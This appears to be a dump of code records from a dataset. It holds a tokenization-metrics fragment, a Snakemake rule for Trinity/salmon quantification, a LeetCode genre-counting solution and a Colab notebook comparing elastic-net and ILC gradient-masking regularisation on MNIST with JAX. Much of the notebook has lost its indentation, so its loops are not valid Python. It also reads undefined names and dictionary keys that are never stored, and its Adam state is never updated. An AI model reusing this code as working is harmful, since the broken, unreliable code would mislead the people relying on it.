    return (len(gold_tokens) - matched) + (len(pred_tokens) - matched)
def precision(gold_tokens, pred_tokens):
    """Precision of the tokenization `pred_tokens` relative to the
    gold-standard `gold_tokens`; NaN when nothing was predicted.
    """
    total_predicted = len(pred_tokens)
    if total_predicted == 0:
        return float('NaN')
    return _n_matches(gold_tokens, pred_tokens) / total_predicted
def recall(gold_tokens, pred_tokens):
    """Recall of the tokenization `pred_tokens` relative to the
    gold-standard `gold_tokens`; NaN when there are no gold tokens.
    """
    total_gold = len(gold_tokens)
    if total_gold == 0:
        return float('NaN')
    return _n_matches(gold_tokens, pred_tokens) / total_gold
|
997,771 | cd08d727c9ca3cbed23a15773da5c18b04a3d9b4 | rule abundance:
    # Quantify per-sample transcript abundance with salmon, driven through
    # Trinity's align_and_estimate_abundance.pl helper script.
    input:
        # Trinity assembly, its gene<->transcript map, and the trimmed read pair.
        assembly=RESULTS + "/assemblies/{sample}_trinity.Trinity.fasta",
        fwd=RESULTS + "/fastq_trimmed/{sample}.1.trimmed.fastq",
        rev=RESULTS + "/fastq_trimmed/{sample}.2.trimmed.fastq",
        map=RESULTS + "/assemblies/{sample}_trinity.Trinity.fasta.gene_trans_map"
    output:
        # The .ok sentinel file marks successful completion of the shell command.
        check=RESULTS + "/quantification/{sample}.ok",
        #salmon_dir=directory(RESULTS + "/quantification/{sample}"),
        quant=RESULTS + "/quantification/{sample}/quant.sf"
    log:
        RESULTS + "/logs/quant/{sample}.quant.log"
    params:
        # Flags forwarded verbatim to align_and_estimate_abundance.pl.
        method="--est_method salmon",
        type="--seqType fq",
        prep="--prep_reference",
        #options="--validateMappings",
        outdir=RESULTS + "/quantification/{sample}"
    # stderr goes to the log file; the sentinel is touched only if the tool succeeds.
    shell:
        "/home/progs/trinityrnaseq-v2.11.0/util/align_and_estimate_abundance.pl "
        "--transcripts {input.assembly} {params.type} --left {input.fwd} --right {input.rev} "
        "{params.method} --gene_trans_map {input.map} {params.prep} "
        "--output {params.outdir} 2> {log} && touch {output.check}"
997,772 | a33ab7900b04782b3b1f27487d55fe25475d4d24 | #Favorite Genres
#https://leetcode.com/discuss/interview-question/373006
def initialize():
    """Return the sample (userSongs, songGenres) fixtures from the prompt."""
    user_songs = {
        "David": ["song1", "song2", "song3", "song4", "song8"],
        "Emma": ["song5", "song6", "song7"],
    }
    song_genres = {
        "Rock": ["song1", "song3"],
        "Dubstep": ["song7"],
        "Techno": ["song2", "song4"],
        "Pop": ["song5", "song6"],
        "Jazz": ["song8", "song9"],
    }
    return user_songs, song_genres
def favGenres(userSongs, songGenres):
    """Return each user's most-listened genre(s).

    userSongs: mapping user -> list of song names.
    songGenres: mapping genre -> list of song names in that genre.
    Returns a mapping user -> list of all genres tied for the highest play
    count (first-seen order); an empty list when no song maps to a genre.
    """
    # Invert songGenres once: song -> genre, for O(1) lookups per song.
    song_to_genre = {}
    for genre, songs in songGenres.items():
        for song in songs:
            song_to_genre[song] = genre
    userGenres = {}
    for user, songs in userSongs.items():
        genre_counts = {}
        best = 0  # renamed from `max`, which shadowed the builtin
        for song in songs:
            genre = song_to_genre.get(song)
            if genre is None:
                # Song without a known genre: skip instead of raising KeyError.
                continue
            genre_counts[genre] = genre_counts.get(genre, 0) + 1
            if genre_counts[genre] > best:
                best = genre_counts[genre]
        userGenres[user] = [g for g, c in genre_counts.items() if c == best]
    return userGenres
if __name__ == '__main__':
    # Demo run on the example data from the problem statement.
    userSongs, songGenres = initialize()
    print(favGenres(userSongs, songGenres))
|
997,773 | 2dd5860d86f9c086e99b686075f347599a0a2c25 | # -*- coding: utf-8 -*-
"""SparseRegElasticNetILC
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/17Mq9jU51uZgUpvuSK3NuXbY8oxq6H_y-
# Comparing Sparse Regularization with Elastic Net with ILC Regularization
### Installations and imports
"""
!pip install -q git+git://github.com/deepmind/optax.git
!pip install -q git+https://github.com/deepmind/dm-haiku
from typing import Any, Generator, Mapping, Tuple
from absl import app
import haiku as hk
import jax
import jax.numpy as jnp
import numpy as np
import optax
import tensorflow as tf
import tensorflow_datasets as tfds
from optax._src import transform
from jax import jit, grad, vmap
from jax.tree_util import tree_structure
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.metrics import confusion_matrix
from sklearn.metrics import precision_recall_fscore_support
from matplotlib.pyplot import figure
"""### AND-mask optax class definition"""
class ANDMaskState(optax.OptState):
    """Stateless: the AND-mask keeps no running statistics; this empty
    subclass exists only to satisfy optax's GradientTransformation API."""  # Following optax code style
def and_mask(agreement_threshold: float) -> optax.GradientTransformation:
    """Build an optax transformation implementing the ILC AND-mask: each
    gradient component is kept only when the mean of its per-example signs
    reaches `agreement_threshold` in absolute value.
    """

    def init_fn(_):
        # optax requires an init_fn even though the mask keeps no state.
        return ANDMaskState()

    def update_fn(updates, opt_state, params=None):
        del params  # unused; kept for the optax update_fn signature

        def mask_leaf(per_example_grads):
            # Agreement test on the sign of each component across examples.
            agree = jnp.abs(jnp.mean(jnp.sign(per_example_grads), 0)) >= agreement_threshold
            agree = agree.astype(jnp.float32)
            mean_grad = jnp.mean(per_example_grads, 0)
            kept_fraction = agree.sum() / agree.size
            # Rescale so the surviving components preserve overall magnitude.
            return agree * mean_grad * (1. / (1e-10 + kept_fraction))

        return jax.tree_map(mask_leaf, updates), opt_state

    return transform.GradientTransformation(init_fn, update_fn)
"""
### Sparse Logistic Regression Function (For reusability)
"""
# Type alias for optimiser state (whatever optax returns from opt.init).
OptState = Any
# A tfds batch: a mapping carrying 'image' and 'label' ndarrays.
Batch = Mapping[str, np.ndarray]
def sparse_logistic_regression(train=None, test=None, adam_lr=1e-3, agreement_threshold=0.0,
                               use_ilc=False, l1_coef=1e-5, l2_coef=1e-4,
                               epochs=10001, Verbose=False, n_classes=10, normalizer=255., training=True):
    """Train an elastic-net-regularised logistic regression with haiku/jax/optax.

    train/test: iterators of tfds batches (dicts with 'image' and 'label').
    adam_lr: Adam learning rate.
    agreement_threshold: AND-mask threshold passed to and_mask() in phase 2.
    use_ilc: when True, train the first half of `epochs` with threshold 0.
        and the second half with `agreement_threshold`; otherwise plain Adam.
    l1_coef / l2_coef: elastic-net regularisation coefficients.
    epochs: total number of SGD steps; accuracy is logged every epochs/10 steps.
    Verbose: print train/test accuracy at every evaluation point.
    n_classes: size of the linear output head.
    normalizer: divisor applied to raw pixels (255. for uint8 images).
    training: when False, skip training and return (net, accuracy) instead.

    Returns (params, training_accs, testing_accs) when training.
    """
    training_accs = []
    testing_accs = []
    def net_fn(batch) -> jnp.ndarray:
        # Linear model: flatten the image and apply a single Linear layer.
        x = jnp.array(batch, jnp.float32) / normalizer
        mlp = hk.Sequential([
            hk.Flatten(),
            hk.Linear(n_classes),
        ])
        return mlp(x)
    # Make the network and optimiser.
    net = hk.without_apply_rng(hk.transform(net_fn))
    # Training loss (cross-entropy).
    def loss(params: hk.Params, batch, label) -> jnp.ndarray:
        """Compute the mean cross-entropy loss of the network (regularization
        is handled separately in regularization_loss)."""
        logits = net.apply(params, batch)
        labels = jax.nn.one_hot(label, n_classes)
        # Cross Entropy Loss
        softmax_xent = -jnp.sum(labels * jax.nn.log_softmax(logits))
        softmax_xent /= labels.shape[0]
        return softmax_xent
    # Regularization loss (L1,L2).
    def regularization_loss(params: hk.Params) -> jnp.ndarray:
        """Compute the elastic-net (L1 + L2) penalty; its gradient is added
        after the ILC mask so regularization is never masked."""
        # L1 Loss
        sum_in_layer = lambda p: jnp.sum(jnp.abs(p))
        sum_p_layers = [sum_in_layer(p) for p in jax.tree_leaves(params)]
        l1_loss = sum(sum_p_layers)
        # L2 Loss
        l2_loss = 0.5 * sum(jnp.sum(jnp.square(p)) for p in jax.tree_leaves(params))
        return l2_coef * l2_loss + l1_coef * l1_loss
    @jax.jit
    def gradient_per_sample(params, batch, label):
        # vmap over a per-example leading axis so the AND-mask can compare
        # gradient signs across individual examples.
        batch, label = jnp.expand_dims(batch,1), jnp.expand_dims(label,1)
        return vmap(grad(loss), in_axes=(None, 0, 0))(params, batch, label)
    gradient = jax.jit(grad(loss))
    gradient_reg = jax.jit(grad(regularization_loss))
    # Evaluation metric (classification accuracy).
    @jax.jit
    def accuracy(params: hk.Params, batch, label) -> jnp.ndarray:
        predictions = net.apply(params, batch)
        return jnp.mean(jnp.argmax(predictions, axis=-1) == label)
    @jax.jit
    def update(
        params: hk.Params,
        opt_state: OptState,
        batch, label, agreement
    ) -> Tuple[hk.Params, OptState]:
        """One SGD step: AND-mask the per-example gradients, add the
        (unmasked) regularization gradient, then apply the optimiser."""
        # grads = jax.grad(loss)(params, batch, label)
        # grads_masked = (gradient_per_sample if use_ilc else gradient)(params, batch, label) # (gradient_per_sample)(params, batch, label)
        # sum_grad_masked_regularized = jax.tree_multimap(lambda x,y:x+y,grads_masked,gradient_reg(params))
        # grads = sum_grad_masked_regularized
        # updates, opt_state = opt.update(grads, opt_state)
        # new_params = optax.apply_updates(params, updates)
        grads_samples = gradient_per_sample(params, batch, label)
        ANDmask = and_mask(agreement)
        masked_grads,_ = ANDmask.update(grads_samples, opt_state)
        reg_grads = gradient_reg(params)
        sum_grad_masked_regularized = jax.tree_multimap(lambda x,y:x+y,masked_grads,reg_grads)
        updates,_ = opt.update(sum_grad_masked_regularized, opt_state)
        new_params = optax.apply_updates(params, updates)
        # NOTE(review): the incoming opt_state (not a refreshed one) is
        # returned, so Adam's moment statistics are never advanced — confirm
        # whether this is intentional.
        return new_params, opt_state
    # We maintain avg_params, the exponential moving average of the "live" params.
    # avg_params is used only for evaluation.
    # For more, see: https://doi.org/10.1137/0330046
    @jax.jit
    def ema_update(
        avg_params: hk.Params,
        new_params: hk.Params,
        epsilon: float = 0.001,
    ) -> hk.Params:
        return jax.tree_multimap(lambda p1, p2: (1 - epsilon) * p1 + epsilon * p2,
                                 avg_params, new_params)
    if training is False:
        # Inference-only mode: hand back the model and the accuracy metric.
        return net, accuracy
    else:
        if use_ilc:
            # Phase 1 (first half of the steps): ILC masking disabled
            # (agreement threshold 0.), warm-starting the weights.
            use_ilc = False
            opt = optax.chain(optax.adam(adam_lr)
                              # ,optax.scale_by_adam()
                              )
            # Initialize network and optimiser; note we draw an input to get shapes.
            params = avg_params = net.init(jax.random.PRNGKey(42), next(train)['image'])
            opt_state = opt.init(params)
            # opt = optax.chain(and_mask(agreement_threshold) if use_ilc else optax.identity(),optax.adam(adam_lr))
            # schedule_fn = optax.exponential_decay(adam_lr, # Note the minus sign!
            #     1,
            #     0.9)
            # opt = optax.chain(optax.sgd(adam_lr), optax.scale_by_schedule(schedule_fn)) # Or Adam could be used
            # Train/eval loop. WITHOUT ILC
            print("Begin training with ILC")
            for step in range(np.int(.5*epochs)):
                if step % np.int(epochs/10) == 0:
                    # Periodically evaluate classification accuracy on train & test sets.
                    # (This shadows the module-level Batch alias with an actual batch.)
                    Batch = next(train)
                    train_accuracy = accuracy(avg_params, Batch['image'], Batch['label'])
                    train_accuracy = jax.device_get(train_accuracy)
                    Batch = next(test)
                    test_accuracy = accuracy(avg_params, Batch['image'], Batch['label'])
                    test_accuracy = jax.device_get(test_accuracy)
                    training_accs.append(train_accuracy)
                    testing_accs.append(test_accuracy)
                    if Verbose:
                        print(f"[ILC Off, Step {step}] Train accuracy/Test accuracy: "
                              f"{train_accuracy:.3f} / {test_accuracy:.3f}.")
                # Do SGD on a batch of training examples.
                Batch = next(train)
                params, opt_state = update(params, opt_state, Batch['image'], Batch['label'], 0.)
                avg_params = ema_update(avg_params, params)
            use_ilc = True
            # Train/eval loop. WITH ILC
            # Phase 2 (second half): same loop, but the AND-mask now uses
            # the caller's agreement_threshold.
            for step in range(np.int(.5*epochs)):
                if step % np.int(epochs/10) == 0:
                    # Periodically evaluate classification accuracy on train & test sets.
                    Batch = next(train)
                    train_accuracy = accuracy(avg_params, Batch['image'], Batch['label'])
                    train_accuracy = jax.device_get(train_accuracy)
                    Batch = next(test)
                    test_accuracy = accuracy(avg_params, Batch['image'], Batch['label'])
                    test_accuracy = jax.device_get(test_accuracy)
                    training_accs.append(train_accuracy)
                    testing_accs.append(test_accuracy)
                    if Verbose:
                        print(f"[ILC On, Step {step}] Train accuracy/Test accuracy: "
                              f"{train_accuracy:.3f} / {test_accuracy:.3f}.")
                # Do SGD on a batch of training examples.
                Batch = next(train)
                params, opt_state = update(params, opt_state, Batch['image'], Batch['label'], agreement_threshold)
                avg_params = ema_update(avg_params, params)
            return params, training_accs, testing_accs
        else:
            # Plain Adam baseline, ILC never enabled.
            # schedule_fn = optax.exponential_decay(adam_lr, # Note the minus sign!
            #     1,
            #     0.9)
            # opt = optax.chain(optax.sgd(adam_lr), optax.scale_by_schedule(schedule_fn)) # Or Adam could be used
            opt = optax.chain(optax.adam(adam_lr))
            # Initialize network and optimiser; note we draw an input to get shapes.
            # NOTE(review): the batch is indexed with [0] here but with ['image']
            # in the ILC branch above — confirm which batch format is expected.
            params = avg_params = net.init(jax.random.PRNGKey(42), next(train)[0])
            opt_state = opt.init(params)
            use_ilc=False
            # Train/eval loop.
            print("Begin training without ILC")
            for step in range(np.int(epochs)):
                if step % np.int(epochs/10) == 0:
                    # Periodically evaluate classification accuracy on train & test sets.
                    Batch = next(train)
                    train_accuracy = accuracy(avg_params, Batch['image'], Batch['label'])
                    train_accuracy = jax.device_get(train_accuracy)
                    Batch = next(test)
                    test_accuracy = accuracy(avg_params, Batch['image'], Batch['label'])
                    test_accuracy = jax.device_get(test_accuracy)
                    training_accs.append(train_accuracy)
                    testing_accs.append(test_accuracy)
                    if Verbose:
                        print(f"[ADAM, Step {step}] Train accuracy/Test accuracy: "
                              f"{train_accuracy:.3f} / {test_accuracy:.3f}.")
                # Do SGD on a batch of training examples.
                Batch = next(train)
                params, opt_state = update(params, opt_state, Batch['image'], Batch['label'], 0.)
                avg_params = ema_update(avg_params, params)
            return params, training_accs, testing_accs
"""### Storing the resulting weights for various hyperparameters, for plotting and exploratory purposes. Change the name when you store a parameter accordingly."""
import pickle
root_dir = '/content/drive/MyDrive/Mila Fall 2020/Probabilistic Graphical Models/Project/Data/'
def storeData(object, file_name, root_dir):
    """Pickle *object* to ``root_dir + file_name``.

    Note: the path is built by plain concatenation, so root_dir should end
    with a separator (as the notebook's callers do).
    """
    # The with-statement closes the file on exit; the explicit f.close()
    # that followed the dump was redundant and has been removed.
    with open(root_dir + file_name, 'wb') as f:
        pickle.dump(object, f)
def loadData(file_name, root_dir):
    """Unpickle and return the object stored at ``root_dir + file_name``."""
    # The with-statement closes the file on exit; the explicit close was redundant.
    with open(root_dir + file_name, 'rb') as f:
        db = pickle.load(f)
    return db
# storeData(envs_elastic_net_params, 'envs_elastic_net_params', root_dir)
# storeData(envs_ilc_params, 'envs_ilc_params_l24_agth_09_late_turn_on_ilc_before_reg', root_dir)
# envs_elastic_net_params = loadData('envs_elastic_net_params_l14_l25', root_dir)
# envs_ilc_params = loadData('envs_ilc_params_l24_agth_03', root_dir)
# storeData(setting_overlaps, 'setting_overlaps', root_dir)
# setting_overlaps = loadData('setting_overlaps', root_dir)
# all_hps = loadData('all_hps', root_dir)
# model, accuracy_fn = sparse_logistic_regression(training=False)
"""### MAIN CELL: Experimenting a range of hyperparameters"""
# at = [0.2, 0.9]
# ll1 = [1e-3]
# ll2 = [1e-3, 1e-4]
# all = []
at = [0.0, 0.2, 0.4, 0.5, 0.7, 0.9]
ll1 = [1e-1, 1e-2, 1e-3]
ll2 = [1e-3, 1e-4, 1e-5]
all = []
n_envs = 2
ds_train_envs = []
batch_size = 10000
splits = tfds.even_splits('train', n=n_envs)
for m in range(n_envs):
ds = tfds.load("mnist:3.*.*", split=splits[m]).cache().repeat()
ds = ds.shuffle(10 * batch_size, seed=0)
ds = ds.batch(batch_size)
ds_train_envs.append(iter(tfds.as_numpy(ds)))
test_ds = tfds.load("mnist:3.*.*", split='test').cache().repeat()
test_ds = test_ds.shuffle(10 * 10000, seed=0)
test_ds = test_ds.batch(10000)
test_ds= iter(tfds.as_numpy(test_ds))
round = 0
for idx, thresh in enumerate(at):
for l1 in ll1:
for l2 in ll2:
round += 1
print('Round: ', round)
envs_elastic_net_params = []
hp = {}
hp['thresh'] = thresh
hp['l1'] = l1
hp['l2'] = l2
hp['params'] = []
hp['training_accuracies'] = []
hp['testing_accuracies'] = []
for m in range(n_envs):
print('Parameters=[l1={}, l2={}, agreement={}], Environment={}'.format(l1,l2,thresh, m))
params, train_accs, test_accs = sparse_logistic_regression(ds_train_envs[m], test_ds, adam_lr=1e-3, agreement_threshold=thresh,
use_ilc=True, l1_coef=l1, l2_coef=l2,
epochs=10001, Verbose=True)
envs_elastic_net_params.append(params)
hp['params'].append(params)
hp['training_accuracies'].append(train_accs)
hp['testing_accuracies'].append(test_accs)
all.append(hp)
# ############################## Run up to here ############################## #
# all = all_hps
n_envs = 2
setting_overlaps_method1 = np.zeros([len(all),10])
setting_overlaps_method2 = np.zeros([len(all),10])
num=0
for r in all:
num += 1
envs_elastic_net_params = r['params']
fig, axes = plt.subplots(len(envs_elastic_net_params), 10, figsize=(16, 4), dpi=130, facecolor='w', edgecolor='k')
# use global min / max to ensure all weights are shown on the same scale
for m in range(n_envs):
vmin, vmax = envs_elastic_net_params[m]['linear']['w'].min(), envs_elastic_net_params[m]['linear']['w'].max()
for coef, ax in zip(envs_elastic_net_params[m]['linear']['w'].T, axes[m,:]):
# print(coef.reshape(28, 28)[0,0])
ax.matshow(coef.reshape(28, 28), cmap=plt.cm.gray, vmin=.5 * vmin,
vmax=.5 * vmax)
ax.set_xticks(())
ax.set_yticks(())
'''
1st method for calculating overlaps: map zeros to 0s, nonzeros to 1s. Get and the mappings. Sum over axis 1 and normalize: by total pixels or max # of nonzero elements.
'''
c = [np.abs(envs_elastic_net_params[i]['linear']['w'].T.round(3)) > 0.0 for i in range(n_envs)]
c = np.array(c)
overlapping_selectors = np.logical_and(c[0],c[1])
denom = np.max(np.vstack((c[0].sum(axis=1),c[1].sum(axis=1))).T, axis=1)
caps = overlapping_selectors.sum(axis=1)/denom # or /28**2
caps[~np.isfinite(caps)] = 0
caps_method1 = caps.round(3) * 100
setting_overlaps_method1[num-1] = caps_method1
'''
2nd method for calculating overlaps: get a boolean mask for equal elements, get a boolean mask for nonzeros elements. And the masks.
Sum over axis 1 and normalize: by total pixels or max # of nonzero elements.
'''
c = [envs_elastic_net_params[i]['linear']['w'].T.round(3) for i in range(n_envs)]
c = np.array(c)
equal_mask = (c[0] == c[1])
nonzero_mask = (c[0] != 0)
overlapping_selectors = np.logical_and(equal_mask,nonzero_mask)
denom = np.max(np.vstack((np.count_nonzero(c[0],axis=1), np.count_nonzero(c[1],axis=1))).T,axis=1)
caps = overlapping_selectors.sum(axis=1)/denom # or /28**2
caps[~np.isfinite(caps)] = 0
caps_method2 = caps.round(3) * 100
setting_overlaps_method2[num-1] = caps_method2
caps_method1[~np.isfinite(caps_method1)] = 0
caps_method1 = caps_method1.round(3)
caps_method2[~np.isfinite(caps_method2)] = 0
caps_method2 = caps_method2.round(3)
caps = ['m1: '+str(c1) +', m2: '+str(c2) for c1,c2 in zip(caps_method1,caps_method2)]
# rows = np.array(r['acc']).round(3)
# rows = ['in: '+str(c1) +', out: '+str(c2) for c1,c2 in zip(np.array(r['acc']).round(3),np.array(r['test_accuracy']).round(3))]
rows = np.array(r['test_accuracy']).round(3)
for ax, col in zip(axes[0], caps):
ax.set_title(col,{'fontsize': 8})
for ax, row in zip(axes[:,0], rows):
ax.set_ylabel(row)
one = r['thresh']
two = r['l1']
three = r['l2']
plt.suptitle('ILC Regularization, Agreement Threshold={}, l1 coefficient={}, l2 coefficient={}'.format(one,two,three))
plt.savefig(f'{num}.png')
plt.show()
"""### Plots for the whole run"""
# NOTE: "all_hps", and "setting_overlaps" should be loaded from your local drive
# (I uploaded them along with the zip file)
import pickle
root_dir = '/'
def storeData(object, file_name, root_dir):
    """Pickle *object* to ``root_dir + file_name`` (duplicate helper from the
    plotting section of the notebook).

    Note: the path is built by plain concatenation, so root_dir should end
    with a separator.
    """
    # The with-statement closes the file on exit; the explicit f.close()
    # that followed the dump was redundant and has been removed.
    with open(root_dir + file_name, 'wb') as f:
        pickle.dump(object, f)
def loadData(file_name, root_dir):
    """Unpickle and return the object stored at ``root_dir + file_name``
    (duplicate helper from the plotting section of the notebook)."""
    # The with-statement closes the file on exit; the explicit close was redundant.
    with open(root_dir + file_name, 'rb') as f:
        db = pickle.load(f)
    return db
# storeData(setting_overlaps, 'setting_overlaps', root_dir)
setting_overlaps = loadData('setting_overlaps', root_dir)
all_hps = loadData('all_hps', root_dir)
# There are 54 settings for hps, for each we need to extract the thresh and l1
# for fixed vals of l2. This function does that.
def idx_extrct(env_idx):
    """Return (agreement threshold, l1 coefficient) of the hyper-parameter
    setting stored at index *env_idx* in the global `all_hps` list.
    """
    setting = all_hps[env_idx]
    return setting['thresh'], setting['l1']
print(setting_overlaps.shape)
"""
coordinate_1 is a list of dictionaries, each dictionary corresponds to a digit
so coordinate_1 is a list of 10 dictionaries. Each dictionary holds these keys:
'digit', 'x', 'y', 'z'. 'digit' is obvious. 'x','y','z' hold the values for 3d
plots, so 'x' holds 18 values for agreement thresholds, 'y' 18 vals for log of
l1 coefs, 'z' 18 vals for overlap scores. Why 18? Remember that our hps are these:
at = [0.0, 0.2, 0.4, 0.5, 0.7, 0.9]
ll1 = [1e-1, 1e-2, 1e-3]
ll2 = [1e-3, 1e-4, 1e-5]
so 6 possible vals for at, 3 for l1, 3 for l2. In total there are 6x3x3=54 configs.
But when l2 is fixed (3D plots are for fixed l2), there remain 6x3=18 combination
of values for agreement and thresh. That's why 'x','y','z' have 18 elements for
each digit in coordinate_1. Now coordinate_1 holds the dicts for l2=0.001. The same
goes for coordinates_2 and coordinates_3. They hold the the coordinates for digits
in settings where l2=1e-4 and l2=1e-5, respectively.
"""
# There are 54 envs.
# threshold
coordinates_1 = []
coordinates_2 = []
coordinates_3 = []
for digit in range(10):
x_1 = []
y_1 = []
z_1 = []
x_2 = []
y_2 = []
z_2 = []
x_3 = []
y_3 = []
z_3 = []
for counter, hp in enumerate(all_hps):
# l2 coef = 0.001
if np.mod(counter,3) == 0:
thresh, l1 = idx_extrct(counter)
x_1.append(thresh)
y_1.append(np.log10(l1))
z_1.append(setting_overlaps[counter, digit])
# l2 coef = 1e-4
if np.mod(counter,3) == 1:
thresh, l1 = idx_extrct(counter)
x_2.append(thresh)
y_2.append(np.log10(l1))
z_2.append(setting_overlaps[counter, digit])
# l2 coef = 1e-5
if np.mod(counter,3) == 2:
thresh, l1 = idx_extrct(counter)
x_3.append(thresh)
y_3.append(np.log10(l1))
z_3.append(setting_overlaps[counter, digit])
coordinates_1.append({'digit': digit, 'x':x_1,'y':y_1,'z':z_1})
coordinates_2.append({'digit': digit, 'x':x_2,'y':y_2,'z':z_2})
coordinates_3.append({'digit': digit, 'x':x_3,'y':y_3,'z':z_3})
""" Getting the coordinates for plotting test accuracies"""
# There are 54 envs.
# threshold
coordinates_test_1 = []
coordinates_test_2 = []
coordinates_test_3 = []
x_1 = []
y_1 = []
z_1 = []
x_2 = []
y_2 = []
z_2 = []
x_3 = []
y_3 = []
z_3 = []
for counter, hp in enumerate(all_hps):
# l2 coef = 0.001
if np.mod(counter,3) == 0:
thresh, l1 = idx_extrct(counter)
x_1.append(thresh)
y_1.append(np.log10(l1))
z_1.append(jax.device_get(hp['test_accuracy_avg']))
# l2 coef = 1e-4
if np.mod(counter,3) == 1:
thresh, l1 = idx_extrct(counter)
x_2.append(thresh)
y_2.append(np.log10(l1))
z_2.append(jax.device_get(hp['test_accuracy_avg']))
# l2 coef = 1e-5
if np.mod(counter,3) == 2:
thresh, l1 = idx_extrct(counter)
x_3.append(thresh)
y_3.append(np.log10(l1))
z_3.append(jax.device_get(hp['test_accuracy_avg']))
coordinates_test_1 = {'l2': 1e-3, 'x':x_1,'y':y_1,'z':z_1}
coordinates_test_2 = {'l2': 1e-4, 'x':x_2,'y':y_2,'z':z_2}
coordinates_test_3 = {'l2': 1e-5, 'x':x_3,'y':y_3,'z':z_3}
colors = dict(mcolors.BASE_COLORS, **mcolors.CSS4_COLORS)
print(colors)
import plotly.express as px
import pandas as pd
import plotly.graph_objs as go
from plotly.subplots import make_subplots
# import plotly.plotly as py
# import plotly.tools as tls
# from plotly.graph_objs import *
########## l2=0.001 ##########
# np_data = []
# df_digits = []
fig = go.Figure()
colors = ["brown","blue","orange","green","magenta","cyan","yellow","violet","skyblue","cornflowerblue"] # "blue" if digit == 7 else "red"
for digit in [7,8]: # This is to show that you can plot the evolution of whatever digits you want.
for m in range(3):
x = [coordinates_1[digit]['x'][n] for n in range(18) if np.mod(n,3) == m]
y = [coordinates_1[digit]['y'][n] for n in range(18) if np.mod(n,3) == m]
z = [coordinates_1[digit]['z'][n] for n in range(18) if np.mod(n,3) == m]
fig.add_trace(go.Scatter3d(x=x, y=y, z=z, mode='lines', line=dict(color=colors[digit]), name=str(digit)))
fig.update_layout(scene = dict(
xaxis_title='Agreement Threshold',
yaxis_title='Log L1 Coef',
zaxis_title='Overlap Score'),
width=700,
margin=dict(r=20, b=10, l=10, t=10))
fig.update_layout(title_text='Salam', title_font_size=10)
fig.show()
fig = go.Figure()
for digit in range(10): # This is to show that you can plot the evolution of whatever digits you want.
for m in range(3):
x = [coordinates_1[digit]['x'][n] for n in range(18) if np.mod(n,3) == m]
y = [coordinates_1[digit]['y'][n] for n in range(18) if np.mod(n,3) == m]
z = [coordinates_1[digit]['z'][n] for n in range(18) if np.mod(n,3) == m]
fig.add_trace(go.Scatter3d(x=x, y=y, z=z, mode='lines', line=dict(color=colors[digit]), name=str(digit)))
fig.update_layout(scene = dict(
xaxis_title='Agreement Threshold',
yaxis_title='Log L1 Coef',
zaxis_title='Overlap Score'),
width=700,
margin=dict(r=20, b=10, l=10, t=10))
fig.show()
# ------------------------ #
fig = go.Figure()
for m in range(3):
x = [coordinates_test_1['x'][n] for n in range(18) if np.mod(n,3) == m]
y = [coordinates_test_1['y'][n] for n in range(18) if np.mod(n,3) == m]
z = [coordinates_test_1['z'][n][0].item()*100 for n in range(18) if np.mod(n,3) == m]
# print(x)
# print(y)
# print(z)
# break
fig.add_trace(go.Scatter3d(x=x, y=y, z=z, mode='lines'
# , line=dict(color="blue" if digit == 7 else "red")
))
fig.update_layout(scene = dict(
xaxis_title='Agreement Threshold',
yaxis_title='Log L1 Coef',
zaxis_title='Test Accuracy'),
width=700,
margin=dict(r=20, b=10, l=10, t=10))
fig.show()
# ########## l2=1e-4 ##########
# Per-digit overlap-score trajectories for the L2 = 1e-4 settings.
# BUG FIX: start a fresh figure here. Previously no new go.Figure() was
# created for this section (unlike the l2=1e-3 section above), so these
# traces were silently appended to the preceding test-accuracy figure.
fig = go.Figure()
for digit in range(10):  # plot the evolution of every digit
    for m in range(3):
        # Taking every third setting keeps one L1-coefficient track per trace.
        x = [coordinates_2[digit]['x'][n] for n in range(18) if np.mod(n, 3) == m]
        y = [coordinates_2[digit]['y'][n] for n in range(18) if np.mod(n, 3) == m]
        z = [coordinates_2[digit]['z'][n] for n in range(18) if np.mod(n, 3) == m]
        fig.add_trace(go.Scatter3d(x=x, y=y, z=z, mode='lines',
                                   line=dict(color=colors[digit]), name=str(digit)))
fig.update_layout(scene=dict(
                      xaxis_title='Agreement Threshold',
                      yaxis_title='Log L1 Coef',
                      zaxis_title='Overlap Score'),
                  width=700,
                  margin=dict(r=20, b=10, l=10, t=10))
fig.show()
# Averaged test-accuracy surface for the same l2 = 1e-4 settings.
fig = go.Figure()
for m in range(3):
    x = [coordinates_test_2['x'][n] for n in range(18) if np.mod(n, 3) == m]
    y = [coordinates_test_2['y'][n] for n in range(18) if np.mod(n, 3) == m]
    # Accuracies are stored as 0-1 device arrays; convert to percent scalars.
    z = [coordinates_test_2['z'][n][0].item() * 100 for n in range(18) if np.mod(n, 3) == m]
    fig.add_trace(go.Scatter3d(x=x, y=y, z=z, mode='lines'))
fig.update_layout(scene=dict(
                      xaxis_title='Agreement Threshold',
                      yaxis_title='Log L1 Coef',
                      zaxis_title='Test Accuracy'),
                  width=700,
                  margin=dict(r=20, b=10, l=10, t=10))
fig.show()
# ########## l2=1e-5 ##########
# Per-digit overlap-score trajectories for the L2 = 1e-5 settings.
# BUG FIX: start a fresh figure here. Previously no new go.Figure() was
# created for this section, so these traces were silently appended to the
# preceding test-accuracy figure.
fig = go.Figure()
for digit in range(10):  # plot the evolution of every digit
    for m in range(3):
        # Taking every third setting keeps one L1-coefficient track per trace.
        x = [coordinates_3[digit]['x'][n] for n in range(18) if np.mod(n, 3) == m]
        y = [coordinates_3[digit]['y'][n] for n in range(18) if np.mod(n, 3) == m]
        z = [coordinates_3[digit]['z'][n] for n in range(18) if np.mod(n, 3) == m]
        fig.add_trace(go.Scatter3d(x=x, y=y, z=z, mode='lines',
                                   line=dict(color=colors[digit]), name=str(digit)))
fig.update_layout(scene=dict(
                      xaxis_title='Agreement Threshold',
                      yaxis_title='Log L1 Coef',
                      zaxis_title='Overlap Score'),
                  width=700,
                  margin=dict(r=20, b=10, l=10, t=10))
fig.show()
# Averaged test-accuracy surface for the same l2 = 1e-5 settings.
fig = go.Figure()
for m in range(3):
    x = [coordinates_test_3['x'][n] for n in range(18) if np.mod(n, 3) == m]
    y = [coordinates_test_3['y'][n] for n in range(18) if np.mod(n, 3) == m]
    # Accuracies are stored as 0-1 device arrays; convert to percent scalars.
    z = [coordinates_test_3['z'][n][0].item() * 100 for n in range(18) if np.mod(n, 3) == m]
    fig.add_trace(go.Scatter3d(x=x, y=y, z=z, mode='lines'))
fig.update_layout(scene=dict(
                      xaxis_title='Agreement Threshold',
                      yaxis_title='Log L1 Coef',
